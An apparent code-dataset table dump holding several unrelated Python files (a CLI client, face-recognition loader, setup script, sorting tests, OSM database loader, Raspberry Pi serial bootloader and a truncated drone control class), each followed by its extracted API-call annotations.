code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
# PYTHON_ARGCOMPLETE_OK
from signal import signal, SIGPIPE, SIG_DFL
#Ignore SIG_PIPE and don't throw exceptions on it... (http://docs.python.org/library/signal.html)
signal(SIGPIPE,SIG_DFL)
from projectdb_api import projectdb_api, PROJECTDB_DEFAULT_URL, POSITIONAL_ARG_REGISTRY
from projectdb_models import *
import argparse
import os
import ConfigParser
import sys
import logging
from pprint import pprint, pformat
from booby import Model
from pyclist.pyclist import pyclist,is_api_method
CONF_FILENAME = 'proji.conf'
CONF_HOME = os.path.expanduser('~/.'+CONF_FILENAME)
class ProjiConfig(object):
def __init__(self):
self.config = ConfigParser.SafeConfigParser()
try:
user = os.environ['SUDO_USER']
conf_user = os.path.expanduser('~'+user+"/."+CONF_FILENAME)
candidates = [conf_user, CONF_HOME]
except KeyError:
candidates = [CONF_HOME]
self.config.read(candidates)
try:
self.projectdb_url = self.config.get('default', 'url')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_url = PROJECTDB_DEFAULT_URL
try:
self.projectdb_username = self.config.get('default', 'username')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_username = None
try:
self.projectdb_token = self.config.get('default', 'token')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError) as e:
self.projectdb_token = None
class Proji(object):
def __init__(self):
self.config = ProjiConfig()
self.cli = pyclist('proj', 'A commandline client for CeR project management.')
self.cli.root_parser.add_argument('--url', '-u', help='Projectdb base url', default=self.config.projectdb_url)
self.cli.root_parser.add_argument('--username', help='Projectdb username', default=self.config.projectdb_username)
self.cli.root_parser.add_argument('--token', help='Token to connect to figshare', default=self.config.projectdb_token)
self.cli.root_parser.add_argument('--profile', '-p', help='Profile to use (profile must be defined in ~/.proji.conf)')
self.cli.root_parser.add_argument('--output', '-o', help='Filter output format')
self.cli.root_parser.add_argument('--separator', '-s', default='\n', help='Separator for output, useful to create a comma-separated list of ids. Default is new-line')
self.cli.add_command(projectdb_api, POSITIONAL_ARG_REGISTRY)
self.cli.parse_arguments()
if self.cli.namespace.profile:
self.cli.parameters['url'] = self.config.config.get(self.cli.namespace.profile, 'url')
self.cli.parameters['token'] = self.config.config.get(self.cli.namespace.profile, 'token')
self.url = self.cli.namespace.url
self.username = self.cli.namespace.username
self.token = self.cli.namespace.token
self.cli.execute()
self.output = self.cli.namespace.output
self.separator = self.cli.namespace.separator
self.cli.print_result(self.output, self.separator)
def run():
Proji()
|
[
"ConfigParser.SafeConfigParser",
"signal.signal",
"os.path.expanduser",
"pyclist.pyclist.pyclist"
] |
[((168, 192), 'signal.signal', 'signal', (['SIGPIPE', 'SIG_DFL'], {}), '(SIGPIPE, SIG_DFL)\n', (174, 192), False, 'from signal import signal, SIGPIPE, SIG_DFL\n'), ((535, 576), 'os.path.expanduser', 'os.path.expanduser', (["('~/.' + CONF_FILENAME)"], {}), "('~/.' + CONF_FILENAME)\n", (553, 576), False, 'import os\n'), ((650, 681), 'ConfigParser.SafeConfigParser', 'ConfigParser.SafeConfigParser', ([], {}), '()\n', (679, 681), False, 'import ConfigParser\n'), ((1696, 1763), 'pyclist.pyclist.pyclist', 'pyclist', (['"""proj"""', '"""A commandline client for CeR project management."""'], {}), "('proj', 'A commandline client for CeR project management.')\n", (1703, 1763), False, 'from pyclist.pyclist import pyclist, is_api_method\n'), ((763, 816), 'os.path.expanduser', 'os.path.expanduser', (["('~' + user + '/.' + CONF_FILENAME)"], {}), "('~' + user + '/.' + CONF_FILENAME)\n", (781, 816), False, 'import os\n')]
|
#!/usr/bin/env python3
import face_recognition
import yaml
from buzz.logger import log
with open("/home/pi/buzz-rpi/buzz/config.yml", "r") as config_file:
CONFIG = yaml.load(config_file, Loader=yaml.FullLoader)
def process_visitor_images(visitor_info):
known_face_encodings = []
known_face_names = []
for key, value in visitor_info.items():
image = face_recognition.load_image_file(
CONFIG["visitors"]["photos_target"] + key + ".jpg")
face_encoding = face_recognition.face_encodings(image, num_jitters=100)[0]
known_face_encodings.append(face_encoding)
known_face_names.append(value['firstName'] + " " + value['lastName'])
log(f"Visitor {key} processed and ready")
return (known_face_encodings, known_face_names)
|
[
"face_recognition.face_encodings",
"buzz.logger.log",
"yaml.load",
"face_recognition.load_image_file"
] |
[((171, 217), 'yaml.load', 'yaml.load', (['config_file'], {'Loader': 'yaml.FullLoader'}), '(config_file, Loader=yaml.FullLoader)\n', (180, 217), False, 'import yaml\n'), ((378, 466), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (["(CONFIG['visitors']['photos_target'] + key + '.jpg')"], {}), "(CONFIG['visitors']['photos_target'] + key +\n '.jpg')\n", (410, 466), False, 'import face_recognition\n'), ((696, 737), 'buzz.logger.log', 'log', (['f"""Visitor {key} processed and ready"""'], {}), "(f'Visitor {key} processed and ready')\n", (699, 737), False, 'from buzz.logger import log\n'), ((500, 555), 'face_recognition.face_encodings', 'face_recognition.face_encodings', (['image'], {'num_jitters': '(100)'}), '(image, num_jitters=100)\n', (531, 555), False, 'import face_recognition\n')]
|
import os
from setuptools import setup, find_packages
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(MODULE_DIR, "requirements.txt"), "r") as f:
requirements = f.read().replace(" ", "").split("\n")
# source of version is in the constants file
VERSION_FILE = os.path.join(MODULE_DIR, "matbench/constants.py")
token = "VERSION = "
with open(VERSION_FILE, "r") as f:
version = None
for line in f.readlines():
if token in line:
version = line.replace(token, "").strip()
# Double quotes are contained in the read line, remove them
version = version.replace("\"", "")
if __name__ == "__main__":
setup(
name='matbench',
version=version,
description='a machine learning benchmark for materials science',
long_description="A machine learning benchmark for materials science. "
"https://github.com/materialsproject/matbench",
url='https://github.com/materialsproject/matbench',
author=['<NAME>', '<NAME>'],
author_email='<EMAIL>',
license='modified BSD',
packages=find_packages(where="."),
package_data={
"matbench": ["*.json"],
"matbench.tests": ["*.json"]
},
zip_safe=False,
install_requires=requirements,
extras_require={},
test_suite='matbench',
tests_require='tests',
include_package_data=True
)
|
[
"os.path.abspath",
"os.path.join",
"setuptools.find_packages"
] |
[((296, 345), 'os.path.join', 'os.path.join', (['MODULE_DIR', '"""matbench/constants.py"""'], {}), "(MODULE_DIR, 'matbench/constants.py')\n", (308, 345), False, 'import os\n'), ((84, 109), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (99, 109), False, 'import os\n'), ((121, 165), 'os.path.join', 'os.path.join', (['MODULE_DIR', '"""requirements.txt"""'], {}), "(MODULE_DIR, 'requirements.txt')\n", (133, 165), False, 'import os\n'), ((1123, 1147), 'setuptools.find_packages', 'find_packages', ([], {'where': '"""."""'}), "(where='.')\n", (1136, 1147), False, 'from setuptools import setup, find_packages\n')]
|
"""Collection of tests for sorting functions."""
# global
from hypothesis import given, strategies as st
import numpy as np
# local
import ivy_tests.test_ivy.helpers as helpers
import ivy.functional.backends.numpy as ivy_np
# argsort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="argsort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_argsort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"argsort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
# sort
@given(
array_shape=helpers.lists(
st.integers(1, 5), min_size="num_dims", max_size="num_dims", size_bounds=[1, 5]
),
input_dtype=st.sampled_from(ivy_np.valid_dtypes),
data=st.data(),
as_variable=st.booleans(),
with_out=st.booleans(),
num_positional_args=helpers.num_positional_args(fn_name="sort"),
native_array=st.booleans(),
container=st.booleans(),
instance_method=st.booleans(),
)
def test_sort(
array_shape,
input_dtype,
data,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
# smoke for torch
if fw == "torch" and input_dtype in ["uint16", "uint32", "uint64"]:
return
# we do not want any nans
x = data.draw(
helpers.nph.arrays(shape=array_shape, dtype=input_dtype).filter(
lambda x: not np.any(np.isnan(x))
)
)
ndim = len(x.shape)
axis = data.draw(st.integers(-ndim, ndim - 1))
descending = data.draw(st.booleans())
stable = data.draw(st.booleans())
helpers.test_array_function(
input_dtype,
as_variable,
with_out,
num_positional_args,
native_array,
container,
instance_method,
fw,
"sort",
x=x,
axis=axis,
descending=descending,
stable=stable,
)
|
[
"hypothesis.strategies.data",
"ivy_tests.test_ivy.helpers.num_positional_args",
"ivy_tests.test_ivy.helpers.test_array_function",
"hypothesis.strategies.sampled_from",
"numpy.isnan",
"hypothesis.strategies.booleans",
"hypothesis.strategies.integers",
"ivy_tests.test_ivy.helpers.nph.arrays"
] |
[((1313, 1516), 'ivy_tests.test_ivy.helpers.test_array_function', 'helpers.test_array_function', (['input_dtype', 'as_variable', 'with_out', 'num_positional_args', 'native_array', 'container', 'instance_method', 'fw', '"""argsort"""'], {'x': 'x', 'axis': 'axis', 'descending': 'descending', 'stable': 'stable'}), "(input_dtype, as_variable, with_out,\n num_positional_args, native_array, container, instance_method, fw,\n 'argsort', x=x, axis=axis, descending=descending, stable=stable)\n", (1340, 1516), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((2698, 2898), 'ivy_tests.test_ivy.helpers.test_array_function', 'helpers.test_array_function', (['input_dtype', 'as_variable', 'with_out', 'num_positional_args', 'native_array', 'container', 'instance_method', 'fw', '"""sort"""'], {'x': 'x', 'axis': 'axis', 'descending': 'descending', 'stable': 'stable'}), "(input_dtype, as_variable, with_out,\n num_positional_args, native_array, container, instance_method, fw,\n 'sort', x=x, axis=axis, descending=descending, stable=stable)\n", (2725, 2898), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1198, 1226), 'hypothesis.strategies.integers', 'st.integers', (['(-ndim)', '(ndim - 1)'], {}), '(-ndim, ndim - 1)\n', (1209, 1226), True, 'from hypothesis import given, strategies as st\n'), ((1255, 1268), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1266, 1268), True, 'from hypothesis import given, strategies as st\n'), ((1293, 1306), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1304, 1306), True, 'from hypothesis import given, strategies as st\n'), ((388, 424), 'hypothesis.strategies.sampled_from', 'st.sampled_from', (['ivy_np.valid_dtypes'], {}), '(ivy_np.valid_dtypes)\n', (403, 424), True, 'from hypothesis import given, strategies as st\n'), ((435, 444), 'hypothesis.strategies.data', 'st.data', ([], {}), '()\n', (442, 444), True, 'from hypothesis import given, strategies as st\n'), ((462, 475), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (473, 475), True, 'from hypothesis import given, strategies as st\n'), ((490, 503), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (501, 503), True, 'from hypothesis import given, strategies as st\n'), ((529, 575), 'ivy_tests.test_ivy.helpers.num_positional_args', 'helpers.num_positional_args', ([], {'fn_name': '"""argsort"""'}), "(fn_name='argsort')\n", (556, 575), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((594, 607), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (605, 607), True, 'from hypothesis import given, strategies as st\n'), ((623, 636), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (634, 636), True, 'from hypothesis import given, strategies as st\n'), ((658, 671), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (669, 671), True, 'from hypothesis import given, strategies as st\n'), ((2583, 2611), 'hypothesis.strategies.integers', 'st.integers', (['(-ndim)', '(ndim - 1)'], {}), '(-ndim, ndim - 1)\n', (2594, 2611), True, 'from hypothesis import given, strategies as st\n'), ((2640, 2653), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2651, 2653), True, 'from hypothesis import given, strategies as st\n'), ((2678, 2691), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2689, 2691), True, 'from hypothesis import given, strategies as st\n'), ((1779, 1815), 'hypothesis.strategies.sampled_from', 'st.sampled_from', (['ivy_np.valid_dtypes'], {}), '(ivy_np.valid_dtypes)\n', (1794, 1815), True, 'from hypothesis import given, strategies as st\n'), ((1826, 1835), 'hypothesis.strategies.data', 'st.data', ([], {}), '()\n', (1833, 1835), True, 'from hypothesis import given, strategies as st\n'), ((1853, 1866), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1864, 1866), True, 'from hypothesis import given, strategies as st\n'), ((1881, 1894), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1892, 1894), True, 'from hypothesis import given, strategies as st\n'), ((1920, 1963), 'ivy_tests.test_ivy.helpers.num_positional_args', 'helpers.num_positional_args', ([], {'fn_name': '"""sort"""'}), "(fn_name='sort')\n", (1947, 1963), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1982, 1995), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (1993, 1995), True, 'from hypothesis import given, strategies as st\n'), ((2011, 2024), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2022, 2024), True, 'from hypothesis import given, strategies as st\n'), ((2046, 2059), 'hypothesis.strategies.booleans', 'st.booleans', ([], {}), '()\n', (2057, 2059), True, 'from hypothesis import given, strategies as st\n'), ((285, 302), 'hypothesis.strategies.integers', 'st.integers', (['(1)', '(5)'], {}), '(1, 5)\n', (296, 302), True, 'from hypothesis import given, strategies as st\n'), ((1676, 1693), 'hypothesis.strategies.integers', 'st.integers', (['(1)', '(5)'], {}), '(1, 5)\n', (1687, 1693), True, 'from hypothesis import given, strategies as st\n'), ((1025, 1081), 'ivy_tests.test_ivy.helpers.nph.arrays', 'helpers.nph.arrays', ([], {'shape': 'array_shape', 'dtype': 'input_dtype'}), '(shape=array_shape, dtype=input_dtype)\n', (1043, 1081), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((2410, 2466), 'ivy_tests.test_ivy.helpers.nph.arrays', 'helpers.nph.arrays', ([], {'shape': 'array_shape', 'dtype': 'input_dtype'}), '(shape=array_shape, dtype=input_dtype)\n', (2428, 2466), True, 'import ivy_tests.test_ivy.helpers as helpers\n'), ((1123, 1134), 'numpy.isnan', 'np.isnan', (['x'], {}), '(x)\n', (1131, 1134), True, 'import numpy as np\n'), ((2508, 2519), 'numpy.isnan', 'np.isnan', (['x'], {}), '(x)\n', (2516, 2519), True, 'import numpy as np\n')]
|
from tango import mixxx_main
#
# Use a playlist named 'Timer' for timing purposes. Fill it with tandas you want timed.
#
if __name__ == '__main__':
mixxx_main(query='Timer', timer=True, embed=False)
|
[
"tango.mixxx_main"
] |
[((154, 204), 'tango.mixxx_main', 'mixxx_main', ([], {'query': '"""Timer"""', 'timer': '(True)', 'embed': '(False)'}), "(query='Timer', timer=True, embed=False)\n", (164, 204), False, 'from tango import mixxx_main\n')]
|
from misc import save_pickle_data, distance_diff
data = [
(0, 45.8242, 15.906),
(1, 45.8135, 15.949),
(2, 45.8129, 15.9594),
(3, 45.8123, 15.9808),
(4, 45.8161, 16.0105),
(5, 45.819, 16.0505),
(6, 45.7999, 15.9201),
(7, 45.801, 15.9324),
(8, 45.7982, 15.9642),
(9, 45.7963, 15.9805), # depot
(10, 45.7964, 16.0152),
(11, 45.7996, 16.0365),
(12, 45.7988, 16.0787),
(13, 45.781, 15.9071),
(14, 45.7848, 15.9315),
(15, 45.7824, 15.9783),
(16, 45.7839, 16.0318),
(17, 45.7847, 16.0636),
(18, 45.7617, 15.906),
(19, 45.7518, 15.9455),
(20, 45.7519, 15.9929),
(21, 45.7536, 16.0384)
]
points = list()
ex_counter = 0
for i in range(0, len(data)):
points.append({'osm_id': None,
'id': i,
'lat': float(data[i][1]),
'lon': float(data[i][2])})
distance_matrix = list([])
for i in range(0, len(points)):
curr = points[i]
temp = list([])
for j in range(0, len(points)):
if i == j:
temp.append(0)
continue
next_ = points[j]
distance = distance_diff(curr['lat'], curr['lon'], next_['lat'], next_['lon'])
temp.append(int(distance))
distance_matrix.append(temp)
print()
save_pickle_data('small_distance_matrix.pkl', distance_matrix)
|
[
"misc.save_pickle_data",
"misc.distance_diff"
] |
[((1290, 1352), 'misc.save_pickle_data', 'save_pickle_data', (['"""small_distance_matrix.pkl"""', 'distance_matrix'], {}), "('small_distance_matrix.pkl', distance_matrix)\n", (1306, 1352), False, 'from misc import save_pickle_data, distance_diff\n'), ((1143, 1210), 'misc.distance_diff', 'distance_diff', (["curr['lat']", "curr['lon']", "next_['lat']", "next_['lon']"], {}), "(curr['lat'], curr['lon'], next_['lat'], next_['lon'])\n", (1156, 1210), False, 'from misc import save_pickle_data, distance_diff\n')]
|
#!/usr/bin/env python3
import psycopg2
import psycopg2.errorcodes
import time
import sys, os
import gzip
import html
import re
import fileinput
#
# Set the following environment variables, or use the PostgreSQL defaults:
# PGHOST, PGPORT, PGUSER, PGPASSWORD, PGDATABASE
#
# curl -s -k http://localhost:8000/osm_1m_eu.txt.gz | gunzip - | ./load_osm_stdin.py
#
rows_per_batch = 10000 # Edit as necessary, but 10k rows is a good starting point
database = os.getenv("PGDATABASE", "defaultdb")
# This is the list of sites where our "tourist" will initially appear upon a page load
sites = []
sites.append({"name": "High density pub area, London", "lat": 51.51214599609375, "lon": -0.0823974609375})
sites.append({"name": "British Museum", "lat": 51.519844, "lon": -0.126731})
sites.append({"name": "Trafalgar Square", "lat": 51.506712, "lon": -0.127235})
sites.append({"name": "Borough Market", "lat": 51.505435, "lon": -0.090446})
sites.append({"name": "Tate Modern", "lat": 51.508337, "lon": -0.099281})
sites.append({"name": "Dublin", "lat": 53.346028, "lon": -6.279658})
sites.append({"name": "Munich", "lat": 48.135056, "lon": 11.576097})
sites.append({"name": "Le Marais", "lat": 48.857744, "lon": 2.357768})
sites.append({"name": "Trastevere", "lat": 41.886071, "lon": 12.467422})
conn = None
def get_db():
global conn
if conn is None:
conn = psycopg2.connect(
database=database
, user=os.getenv("PGUSER", "root")
, port=int(os.getenv("PGPORT", "26257"))
, host=os.getenv("PGHOST", "localhost")
, application_name="OSM Data Loader"
)
return conn
def close_db():
global conn
if conn is not None:
conn.close()
conn = None
def insert_row(sql, close=False):
conn = get_db()
with conn.cursor() as cur:
try:
cur.execute(sql)
#n_ins = cur.rowcount
except Exception as e:
print("execute(sql): ", e)
sys.exit(1)
try:
conn.commit()
except Exception as e:
print("commit(): ", e)
print("Retrying commit() in 1 s")
time.sleep(1)
conn.commit()
if close:
close_db()
def setup_db():
conn = get_db()
with conn.cursor() as cur:
sql = """
SELECT COUNT(*) FROM crdb_internal.tables
WHERE name = 'osm' AND database_name = %s AND state = 'PUBLIC';
"""
n = 0
cur.execute(sql, (database,))
n = cur.fetchone()[0]
if int(n) == 0:
sql = """
DROP TABLE IF EXISTS osm;
CREATE TABLE osm
(
id BIGINT
, date_time TIMESTAMP WITH TIME ZONE
, uid TEXT
, name TEXT
, key_value TEXT[]
, ref_point GEOGRAPHY
, geohash4 TEXT
, CONSTRAINT "primary" PRIMARY KEY (geohash4 ASC, id ASC)
);
"""
print("Creating osm table")
cur.execute(sql)
sql = "CREATE INDEX ON osm USING GIN(ref_point);"
print("Creating index on ref_point")
cur.execute(sql)
# Table of positions for the user
sql = """
DROP TABLE IF EXISTS tourist_locations;
CREATE TABLE tourist_locations
(
name TEXT
, lat FLOAT8
, lon FLOAT8
, enabled BOOLEAN DEFAULT TRUE
, geohash CHAR(9) AS (ST_GEOHASH(ST_SETSRID(ST_MAKEPOINT(lon, lat), 4326), 9)) STORED
, CONSTRAINT "primary" PRIMARY KEY (geohash ASC)
);
"""
print("Creating tourist_locations table")
cur.execute(sql)
sql = "INSERT INTO tourist_locations (name, lat, lon) VALUES (%s, %s, %s);"
print("Populating tourist_locations table")
for s in sites:
cur.execute(sql, (s["name"], s["lat"], s["lon"]))
conn.commit()
sql = "INSERT INTO osm (id, date_time, uid, name, key_value, ref_point, geohash4) VALUES "
vals = []
llre = re.compile(r"^-?\d+\.\d+$")
bad_re = re.compile(r"^N rows: \d+$")
n_rows_ins = 0 # Rows inserted
n_line = 0 # Position in input file
n_batch = 1
setup_db()
for line in fileinput.input():
line = line.rstrip()
n_line += 1
# Get past malformed lines due to printing row counts to stdout in Perl data prep script :-o
if bad_re.match(line):
continue
# 78347 <2018-08-09T22:29:35Z <366321 <63.4305942 <10.3921538 <Prinsenkrysset <highway=traffic_signals|u5r|u5r2|u5r2u|u5r2u7 <u5r2u7pmfxz8b
a = line.split('<')
if 8 != len(a):
continue
(id, dt, uid, lat, lon, name, kvagg, geohash) = a
# (lat, lon) may have this format: 54°05.131'..., which is bogus
if (not llre.match(lat)) or (not llre.match(lon)):
continue
row = str(id) + ", '" + dt + "', '" + uid + "', '" + html.unescape(name).replace("'", "''") + "'"
# Clean up all the kv data
kv = []
# Add the words in the name onto kv
for w in re.split(r"\W+", name.lower()):
if len(w) > 0:
kv.append(w)
for x in kvagg.split('|'):
if len(x) == 0:
continue;
x = html.unescape(x)
x = re.sub(r"['\",{}]", "", x)
kv.append(x)
row += ", '{" + ','.join(kv) + "}'"
row += ", ST_MakePoint(" + lon + ", " + lat + ")::GEOGRAPHY, '" + geohash[0:4] + "'"
vals.append("(" + row + ")")
if len(vals) % rows_per_batch == 0:
print("Running INSERT for batch %d of %d rows" % (n_batch, rows_per_batch))
t0 = time.time()
insert_row(sql + ', '.join(vals))
n_rows_ins += rows_per_batch
vals.clear()
t1 = time.time()
print("INSERT for batch %d of %d rows took %.2f s" % (n_batch, rows_per_batch, t1 - t0))
n_batch += 1
# Last bit
if len(vals) > 0:
insert_row(sql + ', '.join(vals))
n_rows_ins += rows_per_batch
close_db()
|
[
"html.unescape",
"fileinput.input",
"time.time",
"time.sleep",
"re.sub",
"os.getenv",
"sys.exit",
"re.compile"
] |
[((455, 491), 'os.getenv', 'os.getenv', (['"""PGDATABASE"""', '"""defaultdb"""'], {}), "('PGDATABASE', 'defaultdb')\n", (464, 491), False, 'import sys, os\n'), ((3727, 3756), 're.compile', 're.compile', (['"""^-?\\\\d+\\\\.\\\\d+$"""'], {}), "('^-?\\\\d+\\\\.\\\\d+$')\n", (3737, 3756), False, 'import re\n'), ((3764, 3792), 're.compile', 're.compile', (['"""^N rows: \\\\d+$"""'], {}), "('^N rows: \\\\d+$')\n", (3774, 3792), False, 'import re\n'), ((3897, 3914), 'fileinput.input', 'fileinput.input', ([], {}), '()\n', (3912, 3914), False, 'import fileinput\n'), ((4797, 4813), 'html.unescape', 'html.unescape', (['x'], {}), '(x)\n', (4810, 4813), False, 'import html\n'), ((4822, 4849), 're.sub', 're.sub', (['"""[\'\\\\",{}]"""', '""""""', 'x'], {}), '(\'[\\\'\\\\",{}]\', \'\', x)\n', (4828, 4849), False, 'import re\n'), ((5149, 5160), 'time.time', 'time.time', ([], {}), '()\n', (5158, 5160), False, 'import time\n'), ((5258, 5269), 'time.time', 'time.time', ([], {}), '()\n', (5267, 5269), False, 'import time\n'), ((2023, 2036), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (2033, 2036), False, 'import time\n'), ((1413, 1440), 'os.getenv', 'os.getenv', (['"""PGUSER"""', '"""root"""'], {}), "('PGUSER', 'root')\n", (1422, 1440), False, 'import sys, os\n'), ((1501, 1533), 'os.getenv', 'os.getenv', (['"""PGHOST"""', '"""localhost"""'], {}), "('PGHOST', 'localhost')\n", (1510, 1533), False, 'import sys, os\n'), ((1892, 1903), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1900, 1903), False, 'import sys, os\n'), ((1458, 1486), 'os.getenv', 'os.getenv', (['"""PGPORT"""', '"""26257"""'], {}), "('PGPORT', '26257')\n", (1467, 1486), False, 'import sys, os\n'), ((4521, 4540), 'html.unescape', 'html.unescape', (['name'], {}), '(name)\n', (4534, 4540), False, 'import html\n')]
|
import serial
import struct
import time
import sys
import os
import tty
import select
def init_Serial(serial_port):
print("Opening Serial Port ",serial_port)
ser = serial.Serial(
port=serial_port,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS
)
return ser
def wait_for_Pi(addr,ser_i,size):
print("### Wait until Raspberry Pi is ready......")
try:
addr = long(addr,0)
if(addr<0x80000 and addr > 0x7F800):
print("Input address may overlap loader, change to default 0x80000")
addr = 0x80000
elif (addr<0x7F800 and addr + size >0x7F800):
print("Input address may overlap loader, change to default 0x80000")
addr = 0x80000
except ValueError:
addr = 0x80000
print("Invalid address for booting, using default", addr)
# write 'c' to trigger
ser_i.write('c')
print('Settiing image on address:',addr)
address = struct.pack('<l',addr);
for i in address:
ser_i.write(i)
cnt = 0
while cnt < 3:
x = ser_i.read()
if x == '\x03':
cnt = cnt + 1
print("### Raspberry is ready!")
def open_Kernel(kernel_file):
fid = open(kernel_file, "rb")
# Get binaries
data = fid.read()
# Get file size
## (After read, the cursor will point to the end of file,
## which means the size of the file)
f_size = fid.tell()
print("### Kernel image size: %d bytes" % f_size)
fid.close();
return f_size, data
def send_Kernel_size(ser_i, size):
print("\n### Sending Kernel size to RPI")
# send size with little endian
data = struct.pack('<i',size)
for i in data:
ser_i.write(i)
print("### Waiting for size check on Rasberry Pi......")
# read 2 bytes
recv = ser_i.read(2)
if recv == "OK":
print("### Received Acknowledgment!")
else:
print("Error after sending size")
print("Restart")
return False
return True
def send_Kernel(ser_i, kernel_data):
print("### Sending kernel now......")
start = time.time()
for tmp, byte in enumerate(kernel_data):
ser_i.write(byte)
end = time.time()
print("Cost time: ", end-start);
print("### Finished sending!")
return True
def start_interactive(ser,input_file,output_file):
try:
# set tty to cbreak mode
tty.setcbreak(input_file.fileno())
while True:
rfd, _, _ = select.select([ser, input_file], [], [])
if ser in rfd:
r = ser.read(ser.in_waiting).decode("ascii")
output_file.write(r)
output_file.flush()
if input_file in rfd:
r = input_file.read(1)
ser.write(bytes(r.encode("ascii")))
except KeyboardInterrupt:
print("Got keyboard interrupt. Terminating...")
except OSError as e:
print("Got OSError. Terminating...")
finally:
os.system("stty sane")
def main():
if (len(sys.argv) == 3):
serial_port = sys.argv[1]
kernel_img = sys.argv[2]
else:
print("Arguments wrong! Please check it again!")
sys.exit()
# Build connectino to target serial port
ser_i = init_Serial(serial_port)
print("### Serial init success!!")
a = raw_input("### Power on Raspberry Pi and input load address to load kernel img:\n>>")
# load kernel first, so we can check if it will overlap our loader yet.
size, kernel_data = open_Kernel(kernel_img)
## send 'c' to Pi and wait for '\x03\x03\x03' send back
wait_for_Pi(a,ser_i,size)
guard = send_Kernel_size(ser_i, size)
if(guard == True):
send_Kernel(ser_i, kernel_data)
start_interactive(ser_i,sys.stdin,sys.stdout)
if __name__ == "__main__":
main()
|
[
"serial.Serial",
"os.system",
"struct.pack",
"time.time",
"select.select",
"sys.exit"
] |
[((175, 311), 'serial.Serial', 'serial.Serial', ([], {'port': 'serial_port', 'baudrate': '(115200)', 'parity': 'serial.PARITY_NONE', 'stopbits': 'serial.STOPBITS_ONE', 'bytesize': 'serial.EIGHTBITS'}), '(port=serial_port, baudrate=115200, parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)\n', (188, 311), False, 'import serial\n'), ((1063, 1086), 'struct.pack', 'struct.pack', (['"""<l"""', 'addr'], {}), "('<l', addr)\n", (1074, 1086), False, 'import struct\n'), ((1773, 1796), 'struct.pack', 'struct.pack', (['"""<i"""', 'size'], {}), "('<i', size)\n", (1784, 1796), False, 'import struct\n'), ((2232, 2243), 'time.time', 'time.time', ([], {}), '()\n', (2241, 2243), False, 'import time\n'), ((2325, 2336), 'time.time', 'time.time', ([], {}), '()\n', (2334, 2336), False, 'import time\n'), ((3190, 3212), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (3199, 3212), False, 'import os\n'), ((3399, 3409), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3407, 3409), False, 'import sys\n'), ((2632, 2672), 'select.select', 'select.select', (['[ser, input_file]', '[]', '[]'], {}), '([ser, input_file], [], [])\n', (2645, 2672), False, 'import select\n')]
|
#!/usr/bin/env python
import Queue
import thread
import time
from dronekit import connect
from pymavlink import mavutil
#from sensor_msgs.msg import NavSatFix, BatteryState
#from std_msgs.msg import Float64
from models.message import Message
from config.config import Config
class VehicleBase(object):
'''
Abstract class, does not implement vehicle methods (takeoff, land, etc.)
'''
def __init__(self, gcs, addr):
self.rel_alt = 0
self.hdg = 0
self.addr = addr
self.gcs = gcs
self.queue = Queue.Queue()
self.gcs.add_listener("message", self.queue_message)
self.handlers = {}
self.vehicle = None
self.add_handler("info", self.info)
def start(self):
print("Connect to url: %s" % self.addr)
self.vehicle = connect(self.addr, wait_ready=True, heartbeat_timeout=15)
thread.start_new_thread(self.send_status_loop, ())
self.run()
def run(self):
while True:
msg = self.queue.get()
if msg is None:
break
self.on_message(msg)
self.queue.task_done()
def queue_message(self, msg):
if msg is not None:
self.queue.put(msg)
def add_handler(self, msg_type, handler):
